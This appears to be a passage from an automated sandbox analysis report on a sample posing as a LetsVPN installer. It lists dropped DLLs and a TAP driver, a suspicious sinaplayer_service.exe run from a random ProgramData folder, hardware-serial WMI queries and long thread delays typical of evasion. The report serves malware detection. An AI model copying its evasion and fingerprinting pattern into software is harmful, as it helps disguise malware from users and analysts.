              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAE5.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsProcess.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dllJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeAPI coverage: 0.1 %
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeAPI coverage: 6.4 %
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeAPI coverage: 7.6 %
              Source: C:\Windows\System32\svchost.exe TID: 7784Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe TID: 1252Thread sleep count: 117 > 30Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe TID: 1252Thread sleep time: -58500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 1888Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7932Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7088Thread sleep time: -30680s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3060Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3688Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3748Thread sleep time: -300000s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3688Thread sleep time: -215098s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 5656Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 4816Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 5044Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 5388Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeLast function: Thread delayed
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CEB97
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,17_2_6C5CC41C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CE748
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,17_2_6C5CC385
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDCF7
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C565C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,17_2_6C565C91
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDF35
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CD86F
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDA9B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CF00C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CF00C
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,19_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040689E FindFirstFileW,FindClose,19_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00402930 FindFirstFileW,19_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A10D0 GetCurrentProcess,GetProcAddress,FindFirstFileW,28_2_00007FF7132A10D0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1110 FindFirstFileW,28_2_00007FF7132A1110
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A71EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,28_2_00007FF7132A71EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00854318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,53_2_00854318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00865490 FindFirstFileExW,53_2_00865490
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180006940 GetSystemInfo,GlobalMemoryStatusEx,0_2_0000000180006940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 215098
